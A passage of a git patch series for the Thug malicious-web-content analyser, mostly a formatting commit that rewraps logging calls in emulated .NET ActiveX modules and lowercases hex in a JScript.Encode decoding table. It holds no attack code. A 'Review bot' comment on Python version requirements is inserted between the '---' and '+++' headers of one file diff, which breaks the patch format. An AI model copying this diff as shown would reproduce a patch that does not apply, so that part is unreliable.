 count = len(chars.encode("utf-8"))
- log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding.GetByteCount_2] count = {count}")
+ log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}")
 return count
From ad92aa7e6155e34f7df43af29f9062c8104c6f38 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Wed, 10 Apr 2024 16:31:46 +0200
Subject: [PATCH 12/12] Code formatting
---
 tests/Encoding/test_Encoding.py | 2 +-
 tests/Logging/modules/test_MongoDB.py | 5 +-
 .../Formatters/Binary/BinaryFormatter.py | 4 +-
 .../Cryptography/FromBase64Transform.py | 4 +-
 .../modules/System/Text/ASCIIEncoding.py | 4 +-
 thug/DOM/JScriptEncode.py | 174 +++++++++---------
 tools/distributed/thugctrl.py | 2 +-
 7 files changed, 101 insertions(+), 94 deletions(-)
diff --git a/tests/Encoding/test_Encoding.py b/tests/Encoding/test_Encoding.py
index d3826b9890..37aa8330bc 100644
--- a/tests/Encoding/test_Encoding.py
+++ b/tests/Encoding/test_Encoding.py
@@ -15,7 +15,7 @@ def test_unicode(self):
 assert result["encoding"] in ("ascii",)
 def test_utf8_bom(self):
- result = encoding.detect(b"\xEF\xBB\xBF")
+ result = encoding.detect(b"\xef\xbb\xbf")
 assert result["encoding"] in ("UTF-8-SIG",)
 def test_unicode_utf8(self):
diff --git a/tests/Logging/modules/test_MongoDB.py b/tests/Logging/modules/test_MongoDB.py
index 4ccbca98df..983f3355f8 100644
--- a/tests/Logging/modules/test_MongoDB.py
+++ b/tests/Logging/modules/test_MongoDB.py
@@ -57,8 +57,9 @@ class TestMongoDB:
 con_method = "iframe"
 # Creating a MongoDB object for all the test methods.
- with patch(pymongo.__name__ + ".MongoClient", new=mongomock.MongoClient), patch(
- "gridfs.Database", new=mongomock.database.Database
+ with (
+ patch(pymongo.__name__ + ".MongoClient", new=mongomock.MongoClient),
+ patch("gridfs.Database", new=mongomock.database.Database),
 ):
 log.ThugOpts.mongodb_address = "mongodb://localhost:123"
 mongo = MongoDB()
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
index 163a796206..311db5568b 100644
--- a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -6,7 +6,9 @@
 def Deserialize_2(self, buf):
- log.ThugLogging.add_behavior_warn("[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2")
+ log.ThugLogging.add_behavior_warn(
+ "[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2"
+ )
 data = buf.stream.getvalue()
 return Delegate(data)
diff --git a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
index 73e91d30b5..bf050bcf38 100644
--- a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
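Review bot: the parenthesised multi-item `with (` … `):` that this hunk introduces in TestMongoDB is syntax documented only from Python 3.10 (3.9's PEG parser happens to accept it, 3.8 and earlier reject it with a SyntaxError), so a pure formatting commit quietly raises the interpreter floor of the test suite. black emits this form only when its target version is py310 or newer, so presumably the project's formatter configuration already says so, but `requires-python`, the classifiers and the CI matrix should agree with it; if an older interpreter still has to pass, keep the previous two-call form.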
+++ b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
@@ -5,5 +5,7 @@
 def TransformFinalBlock(self, buffer, offset, count):
- log.ThugLogging.add_behavior_warn("[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock")
+ log.ThugLogging.add_behavior_warn(
+ "[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock"
+ )
 return bytes(base64.b64decode("".join(buffer[offset : offset + count])))
diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
index b69eb0f29b..b458d42041 100644
--- a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -5,7 +5,9 @@
 def GetByteCount_2(self, chars):
 count = len(chars.encode("utf-8"))
- log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}")
+ log.ThugLogging.add_behavior_warn(
+ f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}"
+ )
 return count
diff --git a/thug/DOM/JScriptEncode.py b/thug/DOM/JScriptEncode.py
index b9c1949f24..9a0785d4f3 100644
--- a/thug/DOM/JScriptEncode.py
+++ b/thug/DOM/JScriptEncode.py
@@ -7,13 +7,13 @@
 DDECODE = {}
-DDECODE[9] = "\x57\x6E\x7B"
-DDECODE[10] = "\x4A\x4C\x41"
-DDECODE[11] = "\x0B\x0B\x0B"
-DDECODE[12] = "\x0C\x0C\x0C"
-DDECODE[13] = "\x4A\x4C\x41"
-DDECODE[14] = "\x0E\x0E\x0E"
-DDECODE[15] = "\x0F\x0F\x0F"
+DDECODE[9] = "\x57\x6e\x7b"
+DDECODE[10] = "\x4a\x4c\x41"
+DDECODE[11] = "\x0b\x0b\x0b"
+DDECODE[12] = "\x0c\x0c\x0c"
+DDECODE[13] = "\x4a\x4c\x41"
+DDECODE[14] = "\x0e\x0e\x0e"
+DDECODE[15] = "\x0f\x0f\x0f"
 DDECODE[16] = "\x10\x10\x10"
 DDECODE[17] = "\x11\x11\x11"
 DDECODE[18] = "\x12\x12\x12"
@@ -24,107 +24,107 @@
 DDECODE[23] = "\x17\x17\x17"
 DDECODE[24] = "\x18\x18\x18"
 DDECODE[25] = "\x19\x19\x19"
-DDECODE[26] = "\x1A\x1A\x1A"
-DDECODE[27] = "\x1B\x1B\x1B"
-DDECODE[28] = "\x1C\x1C\x1C"
-DDECODE[29] = "\x1D\x1D\x1D"
-DDECODE[30] = "\x1E\x1E\x1E"
-DDECODE[31] = "\x1F\x1F\x1F"
-DDECODE[32] = "\x2E\x2D\x32"
+DDECODE[26] = "\x1a\x1a\x1a"
+DDECODE[27] = "\x1b\x1b\x1b"
+DDECODE[28] = "\x1c\x1c\x1c"
+DDECODE[29] = "\x1d\x1d\x1d"
+DDECODE[30] = "\x1e\x1e\x1e"
+DDECODE[31] = "\x1f\x1f\x1f"
+DDECODE[32] = "\x2e\x2d\x32"
 DDECODE[33] = "\x47\x75\x30"
-DDECODE[34] = "\x7A\x52\x21"
+DDECODE[34] = "\x7a\x52\x21"
 DDECODE[35] = "\x56\x60\x29"
-DDECODE[36] = "\x42\x71\x5B"
-DDECODE[37] = "\x6A\x5E\x38"
-DDECODE[38] = "\x2F\x49\x33"
-DDECODE[39] = "\x26\x5C\x3D"
+DDECODE[36] = "\x42\x71\x5b"
+DDECODE[37] = "\x6a\x5e\x38"
+DDECODE[38] = "\x2f\x49\x33"
+DDECODE[39] = "\x26\x5c\x3d"
 DDECODE[40] = "\x49\x62\x58"
-DDECODE[41] = "\x41\x7D\x3A"
+DDECODE[41] = "\x41\x7d\x3a"
 DDECODE[42] = "\x34\x29\x35"
 DDECODE[43] = "\x32\x36\x65"
-DDECODE[44] = "\x5B\x20\x39"
-DDECODE[45] = "\x76\x7C\x5C"
-DDECODE[46] = "\x72\x7A\x56"
-DDECODE[47] = "\x43\x7F\x73"
-DDECODE[48] = "\x38\x6B\x66"
-DDECODE[49] = "\x39\x63\x4E"
+DDECODE[44] = "\x5b\x20\x39"
+DDECODE[45] = "\x76\x7c\x5c"
+DDECODE[46] = "\x72\x7a\x56"
+DDECODE[47] = "\x43\x7f\x73"
+DDECODE[48] = "\x38\x6b\x66"
+DDECODE[49] = "\x39\x63\x4e"
 DDECODE[50] = "\x70\x33\x45"
-DDECODE[51] = "\x45\x2B\x6B"
+DDECODE[51] = "\x45\x2b\x6b"
 DDECODE[52] = "\x68\x68\x62"
 DDECODE[53] = "\x71\x51\x59"
-DDECODE[54] = "\x4F\x66\x78"
-DDECODE[55] = "\x09\x76\x5E"
-DDECODE[56] = "\x62\x31\x7D"
-DDECODE[57] = "\x44\x64\x4A"
-DDECODE[58] = "\x23\x54\x6D"
+DDECODE[54] = "\x4f\x66\x78"
+DDECODE[55] = "\x09\x76\x5e"
+DDECODE[56] = "\x62\x31\x7d"
+DDECODE[57] = "\x44\x64\x4a"
+DDECODE[58] = "\x23\x54\x6d"
 DDECODE[59] = "\x75\x43\x71"
-DDECODE[60] = "\x4A\x4C\x41"
-DDECODE[61] = "\x7E\x3A\x60"
-DDECODE[62] = "\x4A\x4C\x41"
-DDECODE[63] = "\x5E\x7E\x53"
-DDECODE[64] = "\x40\x4C\x40"
+DDECODE[60] = "\x4a\x4c\x41"
+DDECODE[61] = "\x7e\x3a\x60"
+DDECODE[62] = "\x4a\x4c\x41"
+DDECODE[63] = "\x5e\x7e\x53"
+DDECODE[64] = "\x40\x4c\x40"
 DDECODE[65] = "\x77\x45\x42"
-DDECODE[66] = "\x4A\x2C\x27"
-DDECODE[67] = "\x61\x2A\x48"
-DDECODE[68] = "\x5D\x74\x72"
+DDECODE[66] = "\x4a\x2c\x27"
+DDECODE[67] = "\x61\x2a\x48"
+DDECODE[68] = "\x5d\x74\x72"
 DDECODE[69] = "\x22\x27\x75"
-DDECODE[70] = "\x4B\x37\x31"
-DDECODE[71] = "\x6F\x44\x37"
-DDECODE[72] = "\x4E\x79\x4D"
-DDECODE[73] = "\x3B\x59\x52"
-DDECODE[74] = "\x4C\x2F\x22"
-DDECODE[75] = "\x50\x6F\x54"
-DDECODE[76] = "\x67\x26\x6A"
-DDECODE[77] = "\x2A\x72\x47"
-DDECODE[78] = "\x7D\x6A\x64"
-DDECODE[79] = "\x74\x39\x2D"
-DDECODE[80] = "\x54\x7B\x20"
-DDECODE[81] = "\x2B\x3F\x7F"
-DDECODE[82] = "\x2D\x38\x2E"
-DDECODE[83] = "\x2C\x77\x4C"
-DDECODE[84] = "\x30\x67\x5D"
-DDECODE[85] = "\x6E\x53\x7E"
-DDECODE[86] = "\x6B\x47\x6C"
-DDECODE[87] = "\x66\x34\x6F"
+DDECODE[70] = "\x4b\x37\x31"
+DDECODE[71] = "\x6f\x44\x37"
+DDECODE[72] = "\x4e\x79\x4d"
+DDECODE[73] = "\x3b\x59\x52"
+DDECODE[74] = "\x4c\x2f\x22"
+DDECODE[75] = "\x50\x6f\x54"
+DDECODE[76] = "\x67\x26\x6a"
+DDECODE[77] = "\x2a\x72\x47"
+DDECODE[78] = "\x7d\x6a\x64"
+DDECODE[79] = "\x74\x39\x2d"
+DDECODE[80] = "\x54\x7b\x20"
+DDECODE[81] = "\x2b\x3f\x7f"
+DDECODE[82] = "\x2d\x38\x2e"
+DDECODE[83] = "\x2c\x77\x4c"
+DDECODE[84] = "\x30\x67\x5d"
+DDECODE[85] = "\x6e\x53\x7e"
+DDECODE[86] = "\x6b\x47\x6c"
+DDECODE[87] = "\x66\x34\x6f"
 DDECODE[88] = "\x35\x78\x79"
-DDECODE[89] = "\x25\x5D\x74"
+DDECODE[89] = "\x25\x5d\x74"
 DDECODE[90] = "\x21\x30\x43"
 DDECODE[91] = "\x64\x23\x26"
-DDECODE[92] = "\x4D\x5A\x76"
-DDECODE[93] = "\x52\x5B\x25"
-DDECODE[94] = "\x63\x6C\x24"
-DDECODE[95] = "\x3F\x48\x2B"
-DDECODE[96] = "\x7B\x55\x28"
+DDECODE[92] = "\x4d\x5a\x76"
+DDECODE[93] = "\x52\x5b\x25"
+DDECODE[94] = "\x63\x6c\x24"
+DDECODE[95] = "\x3f\x48\x2b"
+DDECODE[96] = "\x7b\x55\x28"
 DDECODE[97] = "\x78\x70\x23"
 DDECODE[98] = 
"\x29\x69\x41"
-DDECODE[99] = "\x28\x2E\x34"
-DDECODE[100] = "\x73\x4C\x09"
-DDECODE[101] = "\x59\x21\x2A"
+DDECODE[99] = "\x28\x2e\x34"
+DDECODE[100] = "\x73\x4c\x09"
+DDECODE[101] = "\x59\x21\x2a"
 DDECODE[102] = "\x33\x24\x44"
-DDECODE[103] = "\x7F\x4E\x3F"
-DDECODE[104] = "\x6D\x50\x77"
-DDECODE[105] = "\x55\x09\x3B"
+DDECODE[103] = "\x7f\x4e\x3f"
+DDECODE[104] = "\x6d\x50\x77"
+DDECODE[105] = "\x55\x09\x3b"
 DDECODE[106] = "\x53\x56\x55"
-DDECODE[107] = "\x7C\x73\x69"
-DDECODE[108] = "\x3A\x35\x61"
-DDECODE[109] = "\x5F\x61\x63"
-DDECODE[110] = "\x65\x4B\x50"
+DDECODE[107] = "\x7c\x73\x69"
+DDECODE[108] = "\x3a\x35\x61"
+DDECODE[109] = "\x5f\x61\x63"
+DDECODE[110] = "\x65\x4b\x50"
 DDECODE[111] = "\x46\x58\x67"
-DDECODE[112] = "\x58\x3B\x51"
+DDECODE[112] = "\x58\x3b\x51"
 DDECODE[113] = "\x31\x57\x49"
-DDECODE[114] = "\x69\x22\x4F"
-DDECODE[115] = "\x6C\x6D\x46"
-DDECODE[116] = "\x5A\x4D\x68"
-DDECODE[117] = "\x48\x25\x7C"
+DDECODE[114] = "\x69\x22\x4f"
+DDECODE[115] = "\x6c\x6d\x46"
+DDECODE[116] = "\x5a\x4d\x68"
+DDECODE[117] = "\x48\x25\x7c"
 DDECODE[118] = "\x27\x28\x36"
-DDECODE[119] = "\x5C\x46\x70"
-DDECODE[120] = "\x3D\x4A\x6E"
-DDECODE[121] = "\x24\x32\x7A"
-DDECODE[122] = "\x79\x41\x2F"
-DDECODE[123] = "\x37\x3D\x5F"
-DDECODE[124] = "\x60\x5F\x4B"
-DDECODE[125] = "\x51\x4F\x5A"
-DDECODE[126] = "\x20\x42\x2C"
+DDECODE[119] = "\x5c\x46\x70"
+DDECODE[120] = "\x3d\x4a\x6e"
+DDECODE[121] = "\x24\x32\x7a"
+DDECODE[122] = "\x79\x41\x2f"
+DDECODE[123] = "\x37\x3d\x5f"
+DDECODE[124] = "\x60\x5f\x4b"
+DDECODE[125] = "\x51\x4f\x5a"
+DDECODE[126] = "\x20\x42\x2c"
 DDECODE[127] = "\x36\x65\x57"
 DCOMBINATION = {}
diff --git a/tools/distributed/thugctrl.py b/tools/distributed/thugctrl.py
index f96e155292..950e95960e 100644
--- a/tools/distributed/thugctrl.py
+++ b/tools/distributed/thugctrl.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-""" Thug Control
+"""Thug Control
 Send commands to Thug